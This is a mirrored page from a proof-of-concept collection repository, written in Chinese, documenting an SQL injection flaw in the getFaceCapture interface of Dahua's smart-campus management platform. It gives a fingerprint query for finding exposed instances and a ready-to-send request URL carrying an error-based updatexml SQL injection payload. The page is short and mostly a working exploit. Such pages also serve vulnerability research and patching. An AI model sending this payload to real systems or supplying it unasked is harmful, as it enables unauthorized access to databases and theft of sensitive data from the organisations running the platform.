admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/大华 智慧园区综合管理平台 getFaceCapture SQL注入漏洞.md

27 lines
734 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# 大华 智慧园区综合管理平台 getFaceCapture SQL注入漏洞
## 漏洞描述
大华 智慧园区综合管理平台 getFaceCapture 接口存在SQL注入漏洞攻击者通过漏洞可以执行任意SQL语句获取数据库敏感信息
## 漏洞影响
智慧园区综合管理平台
## 网络测绘
```
app="dahua-智慧园区综合管理平台"
```
## 漏洞复现
![image-20230828144644472](images/image-20230828144644472.png)
请求POC
```
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D
```
![image-20230828145938818](images/image-20230828145938818.png)
Reference in New Issue Copy Permalink